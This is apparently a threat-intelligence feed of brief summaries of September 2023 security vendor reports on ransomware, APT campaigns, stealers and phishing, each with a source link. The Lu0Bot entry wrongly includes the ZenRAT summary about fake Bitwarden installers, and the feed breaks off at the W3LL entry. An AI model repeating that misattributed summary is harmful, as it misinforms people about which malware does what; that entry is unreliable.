Summary:: Researchers from Symantec have discovered that the Budworm advanced persistent threat (APT) group is still actively developing its toolkit. Additionally, it was determined that Budworm was targeting an Asian government and a Middle Eastern telecom company with an upgraded version of one of its main tools.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-tool-update-telecoms-govt

Intel Source:: Resecurity

Intel Name:: New_Move_of_Ransomware_Ransomed_vc_Operators

Date of Scan:: 2023-09-28

Impact:: LOW

Summary:: After recently happened data leak from Sony, the same ransomware syndicate Ransomed.vc mentioned about the new victim this time in face of the largest Japanese telecommunication giant NTT Docomo.

Source: https://www.resecurity.com/blog/article/ransomedvc-in-the-spotlight-what-is-known-about-the-ransomware-group-targeting-major-japanese-businesses

Intel Source:: DR. Web

Intel Name:: Hackers_Exploiting_Openfire_Flaw_to_Encrypt_Servers

Date of Scan:: 2023-09-28

Impact:: LOW

Summary:: Openfire messaging servers have a high-severity vulnerability that hackers are actively using to install cryptominers and encrypt servers with ransomware. A popular Java-based open-source chat (XMPP) server called Openfire has been downloaded 9 million times and is frequently used for private, cross-platform chat communications.

Source: https://news.drweb.com/show/?i=14756&lng=enu

Intel Source:: Cyble

Intel Name:: A_new_stealer_called_Exela

Date of Scan:: 2023-09-28

Impact:: LOW

Summary:: Cyble researchers recently observed came across a new stealer called “Exela”. Exela is a Python-based open-source stealer that has a capability to steal a big range of sensitive information from compromised systems.

Source: https://cyble.com/blog/exela-stealer-spotted-targeting-social-media-giants/

Intel Source:: Group-IB

Intel Name:: ShadowSyndicate_a_new_RaaS_threat_actor

Date of Scan:: 2023-09-27

Impact:: MEDIUM

Summary:: Group-IB researchers have identified a threat actor dubbed ShadowSyndicate using the same Secure Shell (SSH) fingerprint on many servers. It is a threat actor that collaborates with other ransomware organizations and programs' affiliates. ShadowSyndicate employs a "off-the-shelf" toolbox for its attacks, which includes the viruses Cobalt Strike, IcedID, and Sliver

Source: https://www.group-ib.com/blog/shadowsyndicate-raas/

Intel Source:: NSFOCUS

Intel Name:: AtlasCross_Hackers_Using_American_Red_Cross_as_Phishing_Lure

Date of Scan:: 2023-09-27

Impact:: LOW

Summary:: A new APT hacking outfit called AtlasCross has been identified by NSFOCUS researchers. AtlasCross targets organizations using phishing lures that pretend to be the American Red Cross in order to spread backdoor malware. They think that a new APT attacker, with a high level of technical proficiency and a careful assault mindset, is responsible for this new attack method. This time, phishing attack activity was observed as part of the attacker's focused attack on particular targets and served as its primary method of in-domain penetration.

Source: https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

Intel Source:: Resecurity

Intel Name:: The_expansion_of_a_Smishing_Triad_attack

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: This month, “Smishing Triad” attack got expended their trace in the UAE. Resecurity researchers has identified domain names that closely resemble those used by the group in their previous campaigns. Threat actors registered the majority of these UAE-focused domains with Gname.com Pte. Ltd.,

Source: https://www.resecurity.com/blog/article/Smishing-Triad-Impersonates-Emirates-Post-Target-UAE-Citizens

Intel Source:: Proofpoint

Intel Name:: A_New_Malware_Called_ZenRAT

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: Researchers from Proofpoint have discovered a brand-new piece of malware dubbed ZenRAT that spreads through fake Bitwarden installation packages. The malware will divert users of other hosts to a safe website and primarily targets Windows users.

Source: https://www.proofpoint.com/us/blog/threat-insight/zenrat-malware-brings-more-chaos-calm

Intel Source:: Any Run

Intel Name:: The_examination_of_Lu0Bot_malware_malicious_activity

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: Any.Run analysts caught some malicious activity tha trtiggered their interest. It was the sample is written in Node.js. While initially, it appeared to be a regular bot for DDOS attacks, it turned out to be a lot more complex. Researchers from Proofpoint have discovered a brand-new piece of malware dubbed ZenRAT that spreads through fake Bitwarden installation packages. The malware will divert users of other hosts to a safe website and primarily targets Windows users.

Source: https://any.run/cybersecurity-blog/lu0bot-analysis/

Intel Source:: Recorded Future

Intel Name:: Chinese_Hackers_TAG_74_Targeting_Organizations_in_South_Korea

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: Recorded Future researchers have identified that a multi-year Chinese state-sponsored cyber espionage campaign has been observed targeting South Korean academic, political, and government organizations.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf

Intel Source:: Mandiant

Intel Name:: Ramps_Up_Its_Spying_Activities

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: Researchers from Mandiant have discovered that APT29's activity and focus on Ukraine accelerated in the first half of 2023 as Kyiv began its counteroffensive, highlighting the SVR's crucial role in gathering information on the current crucial stage of the war. As Kyiv began its counteroffensive in the first half of 2023, APT29's operations accelerated and its focus on Ukraine intensified, underscoring the SVR's crucial involvement in gathering intelligence about the current crucial stage of the war.

Source: https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

Intel Source:: ASEC

Intel Name:: Unveiling_the_Installation_Process_of_Cryptocurrency_CoinMiners

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: AhnLab Security Emergency Response Center (ASEC) has revealed the process of cryptocurrency CoinMiner installation on compromised systems. Threat actors employ PowerShell scripts, primarily "nodejssetup-js.exe," to exploit system resources. Malicious behaviors include code decoding, process injection, and crypto mining. Detecting this threat relies on behavior detection via AhnLab EDR. vigilance, endpoint security, and detailed analysis are essential for defense against this evolving threat.

Source: https://asec.ahnlab.com/en/57222/

Intel Source:: Securonix Threat Labs

Intel Name:: Ukraines_Military_Targeted_in_STARK_VORTEX_with_MerlinAgent_Malware

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: Securonix Threat Research has uncovered an ongoing cyber attack campaign, dubbed STARK#VORTEX, that is specifically targeting Ukraine's military. Orchestrated by the threat group UAC-0154, this campaign utilizes sophisticated techniques to evade detection. The attackers use a Microsoft Help file with an embedded obfuscated JavaScript code as a lure document, disguised as a manual for Pilot-in-Command (PIC) Drones, to deliver the MerlinAgent malware. The PowerShell-based malware is heavily obfuscated and downloads a payload from a remote server, giving attackers full control over compromised systems.

Source: https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/

Intel Source:: ASEC

Intel Name:: Unmasking_the_Threat_Impersonating_the_National_Tax_Service

Date of Scan:: 2023-09-26

Impact:: MEDIUM

Summary:: AhnLab Security Emergency Response Center (ASEC) has identified a concerning threat involving deceptive LNK files posing as the National Tax Service. This threat primarily targets Korean users through email-based distribution. When executed, the LNK file triggers a series of actions, including downloading additional malicious files and compromising user information. Qasar RAT and Amadey malware have been identified as the ultimate payloads

Source: https://asec.ahnlab.com/en/57176/

Intel Source:: Group-IB

Intel Name:: A_detection_of_cryptojacking_campaign_on_a_popular_educational_resource

Date of Scan:: 2023-09-26

Impact:: LOW

Summary:: Group-IB analysts team observed and provided deteils for a cryptojacking campaign on a popular educational resource using Group-IB Managed XDR.

Source: https://www.group-ib.com/blog/mxdr-cryptominer/

Intel Source:: PaloAlto

Intel Name:: Hackers_Using_Gelsemium_to_Attack_Asian_Government

Date of Scan:: 2023-09-25

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have discovered that attacks on a Southeast Asian government that took place over the course of six months in 2022 and 2023 were carried out by a stealthy advanced persistent threat (APT) tracked as Gelsemium. It included a variety of uncommon tools and methods that the threat actor used to establish a covert presence and gather information on private IIS servers owned by a Southeast Asian government organization.

Source: https://unit42.paloaltonetworks.com/rare-possible-gelsemium-attack-targets-se-asia/#post-130207-_p2rfyft6epfb

Intel Source:: fortinet

Intel Name:: The_Retch_and_S_H_O_ransomware_overview

Date of Scan:: 2023-09-25

Impact:: LOW

Summary:: FortiGuard Labs collected data on new ransomware variants that attracted attention within their datasets and the OSINT community. This ransomware report from FortiGuard covered the Retch and S.H.O ransomware.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-retch-and-sho

Intel Source:: PaloAlto

Intel Name:: Alloy_Taurus_Aims_to_Remain_Unnoticed

Date of Scan:: 2023-09-25

Impact:: MEDIUM

Summary:: According to reports, the intrusion set connected to Alloy Taurus started in early 2022 and persisted until 2023, utilizing unusual tactics and evading security measures for long-term persistence and reconnaissance. These attacks, which take place in six waves, take advantage of security holes in Microsoft Exchange Servers to deploy web shells, which act as a conduit to deliver additional payloads, including two previously unidentified.NET backdoors called Zapoa and ReShell, which allow remote command execution and data collection.

Source: https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/

Intel Source:: PaloAlto

Intel Name:: Mustang_Panda_Using_ShadowPad_and_TONESHELL_Variant

Date of Scan:: 2023-09-25

Impact:: MEDIUM

Summary:: The attackers carried out a cyberespionage campaign with the goal of acquiring confidential documents and information while establishing a tenacious and covert foothold. The activity, which took place between the second and third quarters of 2021 and 2023, used a variety of technologies to conduct reconnaissance, steal credentials, keep access, and carry out post-compromise actions.

Source: https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/

Intel Source:: Welivesecurity

Intel Name:: Deadglyph_on_Stealth_Falcon_in_Middle_East

Date of Scan:: 2023-09-25

Impact:: LOW

Summary:: Researchers from ESET have found Deadglyph, a powerful backdoor that the famed Stealth Falcon gang utilized for Middle Eastern espionage. With the use of a machine-specific key, the essential parts are encrypted. Additional modules obtained from its C&C server are used to implement conventional backdoor commands.

Source: https://www.welivesecurity.com/en/eset-research/stealth-falcon-preying-middle-eastern-skies-deadglyph/

Intel Source:: The DFIR Report

Intel Name:: From_ScreenConnect_to_Hive_Ransomware

Date of Scan:: 2023-09-25

Impact:: LOW

Summary:: Researchers from the DFIR Report have seen a threat actor use an RMM tool as their first point of access, which led to a slightly bungled Hive ransomware deployment. An executable file disguised as a legitimate document made up the initial payload. Researchers believe that this campaign was most likely sent as an email with a link that, when clicked, downloaded the executable.

Source: https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/

Intel Source:: TrendMicro

Intel Name:: Analyzing_the_Turla_APT_Group_Activities

Date of Scan:: 2023-09-23

Impact:: LOW

Summary:: Researchers from TrendMicro have studied the Turla cyberespionage gang's efforts throughout the years, paying particular attention to the key MITRE techniques and the accompanying IDs connected to the threat actor group.

Source: https://www.trendmicro.com/en_us/research/23/i/examining-the-activities-of-the-turla-group.html

Intel Source:: Saudiresta

Intel Name:: APT34_group_new_phishing_attack

Date of Scan:: 2023-09-23

Impact:: LOW

Summary:: The Iranian threat group APT34 has been observed with lunching a new phishing attack that used a variant of a backdoor called SideTwist. APT34, also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East

Source: https://www.saudiresta.com/phishing-campaigns-deliver-new-sidetwist-backdoor-and-agent-tesla-variant/

Intel Source:: Sentilone

Intel Name:: Targeting_Telcos_with_a_LuaJIT_Toolkit

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: A series of cyberattacks against telecommunicator providers in the Middle East, Western Europe, and the South Asian subcontinent have been linked to a hitherto unknown threat actor known as Sandman. It is noteworthy that the incursions use the just-in-time (JIT) LuaJIT compiler to deliver the unique LuaDream implant.

Source: https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/

Intel Source:: Checkpoint

Intel Name:: A_Banker_Server_Side_Components_Analysis

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: A recent campaign utilizing a new form of the BBTok banker and operating in Latin America was recently uncovered by Check Point researchers. In the study, we focus on recently identified infection chains that employ a special mix of Living off the Land Binaries (LOLBins).

Source: https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/

Intel Source:: Sonatype

Intel Name:: An_ongoing_campaign_on_the_npm_registry

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: The Sonatype research team tracked down a campaign on the npm registry that uses npm packages to retrieve and exfiltrate your Kubernetes configuration and SSH keys to an external server.

Source: https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys

Intel Source:: Cyble

Intel Name:: Drinik_Malware_Returns_to_Threaten_Indian_Taxpayers

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: Researchers from Cyble have noticed that the Drinik malware showed increased activity levels that were timed to coincide with the deadline for filing Indian income tax returns. Drinik malware's most recent version includes a number of recently introduced features.

Source: https://cyble.com/blog/indian-taxpayers-face-a-multifaceted-threat-with-drinik-malwares-return/

Intel Source:: Welivesecurity

Intel Name:: Iranian_Nation_State_Actor_OilRig_Attacks_sraeli_Organizations

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: As part of two distinct campaigns planned by the Iranian nation-state actor known as OilRig in 2021 and 2022, Israeli organizations have been identified by ESET researchers as being targeted. Two previously known first-stage backdoors called Solar and Mango were used in the attacks, dubbed Outer Space and Juicy Mix, to gather sensitive data from popular browsers and the Windows Credential Manager.

Source: https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/

Intel Source:: McAfee

Intel Name:: Investigation_into_WinRAR_Vulnerability

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: McAfee researchers examined a sample that exploited the major RCE vulnerability CVE-2023-38831. It has to do with an RCE flaw in WinRAR prior to version 6.23. The problem arises because a ZIP archive could contain a harmless file (such a regular.JPG file) as well as a folder with the same name as the innocent file, and when you try to access just the harmless file, the contents of the folder (which might have executable information) are processed.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/exploring-winrar-vulnerability-cve-2023-38831/

Intel Source:: Checkpoint

Intel Name:: The_Evil_Alliance_Between_GuLoader_And_Remcos

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: Remcos and GuLoader have a close relationship, according to Checkpoint researchers. Remcos is hard to employ for nefarious reasons because antivirus programs may quickly detect it. However, Remcos can get around antivirus defense by using GuLoader. During this investigation, they found that GuLoader is now marketed as a crypter that renders its payload completely immune to antivirus software on the same platform as Remcos and is implicitly sold under a different name.

Source: https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/

Intel Source:: Bitsight

Intel Name:: Analysis_of_SmokeLoaders_Plugins

Date of Scan:: 2023-09-22

Impact:: LOW

Summary:: A well-known malware family with a history spanning more than ten years is called SmokeLoader. The primary function of this malware is to download and drop additional malware families. However, the owners of SmokeLoader also market plugins that give the primary module new features. These plugins give an affiliate the ability to gather a variety of information from compromised PCs, including emails, cookies, passwords, and browser data.

Source: https://www.bitsight.com/blog/smokeloaders-plugins

Intel Source:: SOC Radar

Intel Name:: An_Overview_of_NoEscape_Ransomware

Date of Scan:: 2023-09-21

Impact:: MEDIUM

Summary:: As a Ransomware-as-a-Service (RaaS), NoEscape Ransomware first appeared in May 2023. At this time, NoEscape RaaS operators provide affiliates a complete platform that makes it simple to create and administer payloads specifically designed for both Windows and Linux operating systems. NoEscape is also known for its multi-extortion techniques, and it keeps a blog on the Tor network where it lists its victims openly and shows the data that has been exfiltrated from people who refuse to comply with their demands.

Source: https://socradar.io/dark-web-profile-noescape-ransomware/

Intel Source:: ASEC

Intel Name:: Attack_on_MS_SQL_Servers_by_HiddenGh0st_Malware

Date of Scan:: 2023-09-21

Impact:: LOW

Summary:: Recently, ASEC researchers verified the spread of a Gh0st RAT variant that targets poorly managed MS-SQL servers and installs the Hidden rootkit. An open-source rootkit called Hidden, which is available to everyone on GitHub, has the capacity to protect processes and hide files, registry entries, and even itself.

Source: https://asec.ahnlab.com/en/57185/

Intel Source:: CISA

Intel Name:: Advisory_on_Snatch_Ransomware

Date of Scan:: 2023-09-21

Impact:: MEDIUM

Summary:: FBI and CISA released joint Cybersecurity Advisory about Snatch Ransomware which shared IOCs, tactics, techniques, and procedures linked with the Snatch ransomware variant. Snatch threat actors are acting as a ransomware-as-a-service (RaaS) model and change their tactics according to current cybercriminal trends and successes of other ransomware operations.

Source: https://www.cisa.gov/sites/default/files/2023-09/joint-cybersecurity-advisory-stopransomware-snatch-ransomware_0.pdf

Intel Source:: Secureworks

Intel Name:: Gold_Melody_Group_Selling_Compromised_Access_to_Ransomware_Attackers

Date of Scan:: 2023-09-21

Impact:: LOW

Summary:: Researchers at Secureworks have discovered that a financially motivated threat actor has been exposed as an initial access broker (IAB) who buys access to compromised businesses from other adversaries in order to launch follow-up attacks like ransomware. The e-crime group Gold Melody, also known as Prophet Spider (CrowdStrike) and UNC961 (Mandiant).

Source: https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker

Intel Source:: PaloAlto

Intel Name:: Fake_WinRAR_PoC_Exploit_Drops_VenomRAT

Date of Scan:: 2023-09-21

Impact:: LOW

Summary:: Researchers from Palo Alto have discovered a hacker attempting to infect downloaders with the VenomRAT malware by disseminating a phony proof-of-concept (PoC) exploit for a newly patched WinRAR vulnerability on GitHub.

Source: https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/

Intel Source:: Cado Security

Intel Name:: P2Pinfect_Botnet_Targeting_Redis_and_SSH_Services

Date of Scan:: 2023-09-21

Impact:: LOW

Summary:: According to Cado Security researchers, P2Pinfect compromises have been seen in China, the United States, Germany, the UK, Singapore, Hong Kong, and Japan. Since August 28, a new peer-to-peer botnet named P2Pinfect that targets the free source Redis and SSH services has apparently seen a remarkable 600-times rise in traffic, including a 12.3% increase over the previous week.

Source: https://www.cadosecurity.com/cado-security-labs-researchers-witness-a-600x-increase-in-p2pinfect-traffic/

Intel Source:: Proofpoint

Intel Name:: Chinese_Malware_Emerges_Widely

Date of Scan:: 2023-09-20

Impact:: LOW

Summary:: Researchers at Proofpoint have noticed an uptick in activity from particular malware families that target speakers of Chinese. When it comes to cybercrime with a Chinese theme, the recently discovered malware ValleyRAT is emerging, while Sainbox RAT and its related variants have also recently become active.

Source: https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape

Intel Source:: Blackberry

Intel Name:: Silent_Skimmer_Targeting_APAC_and_NALA_Regions

Date of Scan:: 2023-09-20

Impact:: LOW

Summary:: Researchers from BlackBerry have uncovered a brand-new campaign they've called "Silent Skimmer," in which a financially motivated threat actor preys on weak online payment companies in the APAC and NALA areas. Utilizing flaws, the attacker compromises web servers and gains first access. The final payload uses payment scraping tools to collect consumers' sensitive financial information from hacked websites.

Source: https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala

Intel Source:: CyberCX

Intel Name:: The_multiple_investigation_to_the_Akira_ransomware_group

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: The CyberCX researchers assisted with multiple investigations linked to the Akira ransomware group, which wsa actice for last couple momths. They observed some technique that leverages deployment of ransomware onto Windows Hyper-V hypervisor systems, causing major damage to attached virtual machines (VMs).

Source: https://cybercx.co.nz/blog/akira-ransomware/

Intel Source:: Talos

Intel Name:: New_HTTPSnoop_malware_targets_telecom_providers

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: Cisco Talos just discovered a new malware family "HTTPSnoop” being targeted against telecommunications providers in the Middle East. HTTPSnoop is a simple but very effective backdoor that consists of new techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.

Source: https://blog.talosintelligence.com/introducing-shrouded-snooper/

Intel Source:: CISA

Intel Name:: Five_malware_samples_backdoors_analysis

Date of Scan:: 2023-09-19

Impact:: MEDIUM

Summary:: CISA obtained five malware samples - related to SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

Source: https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0

Intel Source:: Cyble

Intel Name:: The_usage_of_an_open_source_PySilon_RAT_by_multiple_threat_actors

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: Cyble researchers have observed the usage of an open-source PySilon RAT by multiple threat actors. The current version is using advanced malware capabilities, including its ability to record keystrokes, steal sensitive information, capture screen activity, execute remote commands, and perform additional functions.

Source: https://cyble.com/blog/emerging-threat-understanding-the-pysilon-discord-rats-versatile-features/

Intel Source:: Esentire

Intel Name:: LockBit_Gang_Attacks_an_MSP_and_Two_Manufacturers

Date of Scan:: 2023-09-19

Impact:: MEDIUM

Summary:: eSentire, one of the top MDR security services provider caught and shut down three separate ransomware attacks launched by LockBit Ransomware Gang. LockBit is one of the most destructive ransomware groups currently operating worldwide. The companies targeted include a storage materials manufacturer, a manufacturer of home décor, and a Managed Service Provider.

Source: https://www.esentire.com/blog/russia-linked-lockbit-ransomware-gang-attacks-an-msp-and-two-manufacturers-using-the-targets-rmm-tools-to-infect-downstream-customers-and-employees-with-ransomware

Intel Source:: Cofense

Intel Name:: LokiBot_information_stealer

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot has remained in the top five malware families delivered through phishing emails.

Source: https://cofense2022stg.wpengine.com/blog/lokibot-phishing-malware-baseline/

Intel Source:: Sophos

Intel Name:: Liquidity_mining_scam_activity

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: Sophos has observed one liquidity mining scams variant has been growing at a rapid pace - fake. Sophos X-Ops has also seen growth in crypto phishing sites that connect to cryptocurrency wallets while impersonating cryptotrading-related brands in other types of scams, but these sites are often used by sha zhu pan scammers to separate victims from their money.

Source: https://news.sophos.com/en-us/2023/09/18/latest-evolution-of-pig-butchering-scam-lures-victim-into-fake-mining-scheme/

Intel Source:: Sysdig

Intel Name:: A_new_cloud_native_cryptojacking_operation_AMBERSQUID

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: The Sysdig Threat Research Team has uncovered a novel cloud-native cryptojacking operation which called AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker.

Source: https://sysdig.com/blog/ambersquid/

Intel Source:: Cyble

Intel Name:: Cobalt_Strike_Beacon_delivery

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: Cyble researchers observed a typosquatted domain of Sophos. That phishing site contains a malware payload embedded within its source code. When a user visits this site, the malware is automatically downloaded to the victim’s machine without requiring any user interaction.

Source: https://cyble.com/blog/covert-delivery-of-cobalt-strike-beacon-via-sophos-phishing-website/

Intel Source:: Cyfirma

Intel Name:: RedLine_stealer_new_variant

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: Cyfirma investigation revealed a new strain of malware that is being distributed under the guise of fake documents or software. It uses multi-level obfuscation to avoid detection and Uses obfuscated PowerShell script as dropper and to execute the malware.

Source: https://www.cyfirma.com/outofband/redline-stealer-a-new-variant-surfaces-deploying-using-batch-script/

Intel Source:: Cert.Pl

Intel Name:: DotRunPeX_analysis

Date of Scan:: 2023-09-19

Impact:: LOW

Summary:: Polish national CERT observed a new malspam campaign targeting Polish users. It all started with this phishing email and initial email was sent from a legitimate employee account of a polish company (using stolen credentials) Also a polish C2 server was used.

Source: https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/

Intel Source:: Sentilone

Intel Name:: A_recent_variant_of_the_Shlayer_malware

Date of Scan:: 2023-09-18

Impact:: LOW

Summary:: Sentilone shared about the details of the malware variant and how it can be decoded to reveal the telltale Shlayer signature. Shlayer is the one who the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory.

Source: https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/

Intel Source:: PaloAlto

Intel Name:: 10_most_active_types_of_Turla_malware

Date of Scan:: 2023-09-18

Impact:: LOW

Summary:: Palo Alto researchers analyzed the top 10 most recently active types of malware in Pensive Ursa’s arsenal: Capibar, Kazuar, Snake, Kopiluwak, QUIETCANARY/Tunnus, Crutch, ComRAT, Carbon, HyperStack and TinyTurla. MITRE has described Turla as being “known for their targeted intrusions and innovative stealth.”

Source: https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/

Intel Source:: Intel471

Intel Name:: Return_of_Bumblebee_Loader_in_New_Campaign

Date of Scan:: 2023-09-18

Impact:: LOW

Summary:: Intel471 researchers have discovered a fresh campaign that uses WebDAV (Web Distributed Authoring and Versioning) servers to spread Bumblebee payloads. Threat actors use malicious spam emails to send out Windows shortcut (.LNK) and compressed archive (.ZIP) files that contain.LNK files in this campaign. These LNK files run a preset sequence of commands designed to download Bumblebee malware stored on WebDAV servers when they are triggered by the user.

Source: https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign

Intel Source:: TrendMicro

Intel Name:: Earth_Lusca_Hackers_Using_Cobalt_Strike

Date of Scan:: 2023-09-18

Impact:: MEDIUM

Summary:: The Linux-based malware, which has been dubbed SprySOCKS due to its quick behavior and SOCKS implementation, has been identified by TrendMicro researchers while keeping track of Earth Lusca. It appears to have come from the open-source Windows backdoor Trochilus.

Source: https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html

Intel Source:: Deep Instinct

Intel Name:: A_new_malicious_LNK_file_activity

Date of Scan:: 2023-09-16

Impact:: LOW

Summary:: The Deep Instinct Threat Lab has discovered a new operation against Azerbaijanian targets. The operation has at least two different initial access vectors. The operation is not associated with a known threat actor; the operation was instead named because of their novel malware written in the Rust programming language

Source: https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets

Intel Source:: Microsoft

Intel Name:: Attacks_on_Defense_Organizations_by_Iranian_Hackers

Date of Scan:: 2023-09-15

Impact:: MEDIUM

Summary:: Since February 2023, Microsoft researchers have seen that a threat group supported by Iran has been conducting password spray attacks against hundreds of businesses in the United States and around the world. Additionally, a small number of victims in the pharmaceutical, satellite, and defense industries had their sensitive data stolen by state hackers.

Source: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Intel Source:: Malwarebytes

Intel Name:: BatLoader_malware_used_in_malicious_campaign

Date of Scan:: 2023-09-15

Impact:: LOW

Summary:: Malwarebytes researchers saw the same malicious ad whenever they searched for Webex. A new malvertising campaign is targeting corporate users who are downloading the popular web conferencing software Webex.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/09/ongoing-webex-malvertising-drops-batloader

Intel Source:: Netscope

Intel Name:: New_Python_NodeStealer_campaign

Date of Scan:: 2023-09-15

Impact:: LOW

Summary:: Netskope Threat Labs is monitoring a campaign that uses malicious Python scripts to steal Facebook business users’ credentials and browser data. This campaign aims accounts with bogus Facebook messages with a malicious file attached. The attacks are targeted victims in general in Southern Europe and North America.

Source: https://www.netskope.com/blog/new-python-nodestealer-goes-beyond-facebook-credentials-now-stealing-all-browser-cookies-and-login-credentials

Intel Source:: Cyble

Intel Name:: Python_malware_activity_campaigns

Date of Scan:: 2023-09-15

Impact:: LOW

Summary:: Cyble researchers discovered Python malware capturing screenshots and sending them over FTP to remote attackers. They also observed similar campaigns in the recent past targeting the United States and Germany, with the perpetrator tracked as “TA866”. This campaign involves the execution of PowerShell script, which is responsible for taking screenshots and uploading them to a remote FTP server.

Source: https://cyble.com/blog/tatar-language-users-in-the-crosshairs-of-python-screenshotter/

Intel Source:: Security Affairs

Intel Name:: Free_download_manager_served_Linux_malware

Date of Scan:: 2023-09-15

Impact:: LOW

Summary:: Researchers from Kaspersky observed a free download manager site that has been hacked to inject Linux malware. The experts discovered during their research the domain was compromised had a deb.fdmpkg[.]org subdomain.

Source: https://securityaffairs.com/150851/malware/free-download-manager-supply-chain-attack.html?amp=1

Intel Source:: Retool

Intel Name:: Unauthorized_access_to_Cloud_accounts

Date of Scan:: 2023-09-15

Impact:: LOW

Summary:: Lately, Retool told their 27 cloud customers that there had been unauthorized access to their accounts. The attacker was able to navigate through multiple layers of security controls after taking advantage of one of our employees through a SMS-based phishing attack.

Source: https://retool.com/blog/mfa-isnt-mfa/

Intel Source:: Fortinet

Intel Name:: New_MidgeDropper_dropper

Date of Scan:: 2023-09-14

Impact:: MEDIUM

Summary:: FortiGuard Labs discoverd a new dropper variant called MidgeDropper. They analyzed it, this dropper made an interesting case study for them. The affected platforms are Windows and potential impact is to deploy additional malware for additional purposes

Source: https://www.fortinet.com/blog/threat-research/new-midgedropper-variant

Intel Source:: Sucuri

Intel Name:: Credit_card_theft_malware

Date of Scan:: 2023-09-14

Impact:: LOW

Summary:: During their website cleanup of a compromised Magento ecommerce website, Sucuri analysts caught something that triggered their attention: Credit card theft malware that was concealed through a single, invisible pixel. So analysts in their post shared how they explored how the attackers were able to use a single hidden pixel as a red herring to conceal a broader infection on a checkout page and review a collection of other similar Magecart attacks.

Source: https://blog.sucuri.net/2023/09/decoding-magecart-credit-card-skimmers-concealed-through-pixels-images.html

Intel Source:: Zscaler

Intel Name:: Scams_Targeting_Windows_Action_Center_Notifications

Date of Scan:: 2023-09-14

Impact:: LOW

Summary:: Zscaler researchers have recently noticed an increase in tech support scams, with a particular emphasis on the exploitation of Windows Action Center notifications to provide consumers with false warning warnings. While fake Windows Defender notifications used to make up the majority of tech-support scams, scammers have since expanded their repertoire to include phony websites pretending to be those of McAfee and Avast, among other security companies.

Source: https://www.zscaler.com/blogs/security-research/rise-tech-support-scams-abusing-windows-action-center-notifications

Intel Source:: Group-IB

Intel Name:: W3LL_Behind_Phishing_Attack_on_Microsoft_365_Business

Date of Scan:: 2023-09-14

Impact:: LOW

